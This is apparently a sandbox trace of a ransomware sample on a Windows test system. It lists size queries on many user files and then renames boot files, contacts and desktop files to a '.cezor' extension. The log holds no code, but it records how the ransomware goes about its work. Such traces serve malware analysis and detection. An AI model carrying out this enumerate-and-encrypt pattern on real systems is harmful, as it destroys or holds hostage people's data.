Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\wEWdm1lt.wav type = size, size_out = 23826 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\wHquroq M2bDSunIrjJ.wav type = size, size_out = 35414 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\XQtttNc8l WMW7IPg.m4a type = size, size_out = 66261 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\_9l8.wav type = size, size_out = 21418 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\_D7Y.m4a type = size, size_out = 10616 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\-W0-.gif type = size, size_out = 64561 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\Aor58F2ltwiS2qWZJE.bmp type = size, size_out = 78970 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\FDQ3v_tHbiNjViuE.jpg type = size, size_out = 44155 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\hiUvM1waNbZk-e.bmp type = size, size_out = 65030 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\jMNoGbN.gif type = size, size_out = 18569 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\L4Lb_VKCFG5Baj3.gif type = size, size_out = 4367 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\MCZaDa0QQJ6wcNZUXn.gif type = size, size_out = 36993 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\MkdmiW2n2hm UFrse-.bmp type = size, size_out = 93116 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OFMo70Ypi.jpg type = size, size_out = 24681 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\QoXfvFeQOhQIV.png type = size, size_out = 2918 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\S4GQ2GGMfzy1DKUl.png type = size, size_out = 26480 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\VyatE0vXWAqC0OxRt_.jpg type = size, size_out = 10619 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\y18suG.gif type = size, size_out = 93489 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\M45yR7c437.avi type = size, size_out = 29716 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ReEw7jE5wqOg.swf type = size, size_out = 77107 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0oqCmMdMfyA -VyQ\am8f6gN_e89TbRknT.wav type = size, size_out = 36863 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0oqCmMdMfyA -VyQ\gW8MJuJm9dKBS.swf type = size, size_out = 89045 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\4_mbPPGlzHp_oUuJ-H3Z.bmp type = size, size_out = 35171 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\6lkmIZ.jpg type = size, size_out = 78437 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\bYco6U CoNywT.ots type = size, size_out = 51187 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\sH_lIdhNg4 u9hq.xls type = size, size_out = 26022 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\UB qDPSTcD6SsAM5.pdf type = size, size_out = 42000 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\4k4 81HVDXuJOl.odp type = size, size_out = 25997 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\eMppgNp_d0eONIt.mp4 type = size, size_out = 98953 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\ok1IxJmM0MNDy1z2SKRW.odp type = size, size_out = 7612 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\Rqjkx-Inyu564.bmp type = size, size_out = 66502 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\wpZkXn.mp4 type = size, size_out = 56923 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\wWuRiwRN3-J7Oj9WP.jpg type = size, size_out = 52047 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\Favorites.vss type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst type = size, size_out = 271360 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\68l k.odp type = size, size_out = 31559 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\foWRjFtWYtlcWkIBF.ppt type = size, size_out = 35970 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\l8IL3_dOyLyH.odp type = size, size_out = 97675 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\QITXJJCFSuy.rtf type = size, size_out = 66468 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\wYeZ7WgnHNP8l.rtf type = size, size_out = 58436 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url type = size, size_out = 236 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url type = size, size_out = 226 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url type = size, size_out = 134 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\AwfOXmr1.mp3 type = size, size_out = 64329 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\hd0rzFg.m4a type = size, size_out = 17115 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\j34KVbd 7j.mp3 type = size, size_out = 66657 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\KeEk_O9.mp3 type = size, size_out = 34226 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\lGrnoXKuinB.m4a type = size, size_out = 102221 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\lWn6_.m4a type = size, size_out = 90108 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\MChYwIiGCBst93Q.wav type = size, size_out = 26079 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\O_o33d.m4a type = size, size_out = 94018 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\RU_Ytkp2w qp.mp3 type = size, size_out = 86418 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\sGdLslAC.mp3 type = size, size_out = 58266 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\twAQxH8FOS.m4a type = size, size_out = 22316 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\W783g cZVYe_Q3ZTfs.mp3 type = size, size_out = 24358 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\_BaDSqvWqTCo.m4a type = size, size_out = 101598 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\-ExuX9LOjl2Rf0Z.png type = size, size_out = 76652 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\3mlI5OW4Ceei.png type = size, size_out = 56879 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\4iAitK.png type = size, size_out = 64590 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\4X0WuHIKFlmcsmSj8wH.jpg type = size, size_out = 45711 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\60jL.jpg type = size, size_out = 19140 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\AfHqN B.gif type = size, size_out = 76224 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\u3J7SbbSL4_idzLNM.bmp type = size, size_out = 74769 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\UYXfotd1.png type = size, size_out = 102292 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\v9Hxi uz2vt-5XDoxdC.bmp type = size, size_out = 47942 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\wpAW.jpg type = size, size_out = 13041 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\xRTD4.png type = size, size_out = 23140 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\Gx9Mb.swf type = size, size_out = 86944 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\I42cS5 VvN3aGuFi.mp4 type = size, size_out = 1695 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\IE-asuVeDit5fMSdkB0.flv type = size, size_out = 43320 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\v2tEOgOZeF-wSXfUeb.mp4 type = size, size_out = 81564 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\ZNFPhs7VtfT6Wy.mp4 type = size, size_out = 83540 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\T0CQ8VVBC5Xi_UA\5 wO.jpg type = size, size_out = 95447 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\T0CQ8VVBC5Xi_UA\xIlfywT2BL_f.m4a type = size, size_out = 82368 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico type = size, size_out = 29926 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\70Jmk.odp type = size, size_out = 3485 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\F0eUqh0cOkUTa7DO.docx type = size, size_out = 76074 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\FN--.ods type = size, size_out = 85501 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\K_RwYW.odt type = size, size_out = 49221 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\NxEBIllQ9 cZLQxHAnf.xlsx type = size, size_out = 73535 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\xkuwOm0rA.ods type = size, size_out = 89151 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\ypdm7CG6ozW8_F3RQh.pps type = size, size_out = 50456 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\1m7527vbdeC.gif type = size, size_out = 32261 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\8jZ3LBgNvW1arBclEu8.gif type = size, size_out = 34504 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\axSg-zF.gif type = size, size_out = 42870 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\cSaVaB0sUlp.gif type = size, size_out = 40357 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\E5 Uz-9etUMMH3CKQC.bmp type = size, size_out = 38557 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\EWTals.png type = size, size_out = 5507 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\TK27wDdNd6Xfl 2b_k_.gif type = size, size_out = 77568 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\Wqelj SIFg-o4.png type = size, size_out = 19615 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\kU7oVdD-q0QJXT.swf type = size, size_out = 62960 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\uYUuV.swf type = size, size_out = 97682 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\T0CQ8VVBC5Xi_UA\xt72dHYiX\-1 X.bmp type = size, size_out = 44366 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\T0CQ8VVBC5Xi_UA\xt72dHYiX\u39sgkNzI3ujT06Y2kP.gif type = size, size_out = 64207 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\-3tBc\dbOCkvV1nk u.doc type = size, size_out = 48884 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\-3tBc\p-qIG.doc type = size, size_out = 38057 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\-3tBc\RBanc_ Xhdc-T.xlsx type = size, size_out = 65816 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\-3tBc\x46p.rtf type = size, size_out = 16015 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\KevqRYRLai6W-uOAz\cpZgjv9AbFGPDH.odt type = size, size_out = 78451 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\KevqRYRLai6W-uOAz\rBf2xQ.ods type = size, size_out = 44791 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\B2EsvKtcKir28U.mkv type = size, size_out = 72034 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\Jf 8.avi type = size, size_out = 54307 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\KIbJxOBGwieG.avi type = size, size_out = 5379 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\WTnDwa-D4KBHQUw.mkv type = size, size_out = 57218 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip type = size, size_out = 42495 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat type = size, size_out = 32768 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab type = size, size_out = 581730 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi type = size, size_out = 185344 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties type = size, size_out = 719 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab type = size, size_out = 25340970 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi type = size, size_out = 906752 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\Kpmxx2VVkoY4H0fX.mp4 type = size, size_out = 34566 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\5rGtE2ND.flv type = size, size_out = 50162 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\ccASAQTIpPKgN.flv type = size, size_out = 94194 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\OTozEY.mkv type = size, size_out = 100108 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\Xp-kb7abpIDOqh4\M5qZaTsTRd.mp4 type = size, size_out = 75425 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\Xp-kb7abpIDOqh4\ykO6fV_h.avi type = size, size_out = 34282 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml type = size, size_out = 13 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\3O75JDME\www.google[1].xml type = size, size_out = 13 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml type = size, size_out = 836 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\9vWEh.mkv type = size, size_out = 19250 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\dH-l6u.avi type = size, size_out = 95789 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\KZ_Ff2.avi type = size, size_out = 89792 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\ziyBrxM6Ba3SqMjEYO.avi type = size, size_out = 10427 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\oADBIR\8KFC8j7.swf type = size, size_out = 1782 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\oADBIR\K KksBwzXVChJt.mp4 type = size, size_out = 65252 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\oADBIR\KiC_I4C.avi type = size, size_out = 47994 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\-upHLx loeeu-TB.mkv type = size, size_out = 24383 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\8XX4ge15eOKpjI.mp4 type = size, size_out = 65829 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\POBuKqk7p3HVpix_cM.mp4 type = size, size_out = 61136 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\rM0K82IAegAWaw6N.swf type = size, size_out = 70161 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\f NqUp5_D7sMGe.flv type = size, size_out = 11062 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\h4Ure_SWB.mp4 type = size, size_out = 70574 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\RbKeEPsH8.avi type = size, size_out = 97763 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\shUk4EGQd0zRO ddsru9.mkv type = size, size_out = 55110 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\tEhXK0.mp4 type = size, size_out = 76317 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\yboEd.avi type = size, size_out = 85005 True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Move C:\Boot\BCD.LOG1.cezor source_filename = C:\Boot\BCD.LOG1 True 1
Fn
Move C:\Boot\BCD.LOG2.cezor source_filename = C:\Boot\BCD.LOG2 True 1
Fn
Move C:\Boot\BOOTSTAT.DAT.cezor source_filename = C:\Boot\BOOTSTAT.DAT True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\7FXGdv.mkv.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\7FXGdv.mkv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\DfM1jMQH5m.m4a.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\DfM1jMQH5m.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eCYysFOHAuDPd0.odp.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eCYysFOHAuDPd0.odp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\fn3wxYGSmK_5.wav.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\fn3wxYGSmK_5.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gl-n 26G.bmp.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gl-n 26G.bmp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\GMWkR.wav.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\GMWkR.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\I TKCX nhSV2b.mp3.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\I TKCX nhSV2b.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KdF36F.avi.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KdF36F.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\kKP8D1f.mp3.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\kKP8D1f.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\nborqaG7LbY-8nT0ByEv.pps.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\nborqaG7LbY-8nT0ByEv.pps True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\nXxNQgqy6gVdEPQ.bmp.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\nXxNQgqy6gVdEPQ.bmp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\OjEEOfskM8q.m4a.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\OjEEOfskM8q.m4a True 1
Fn
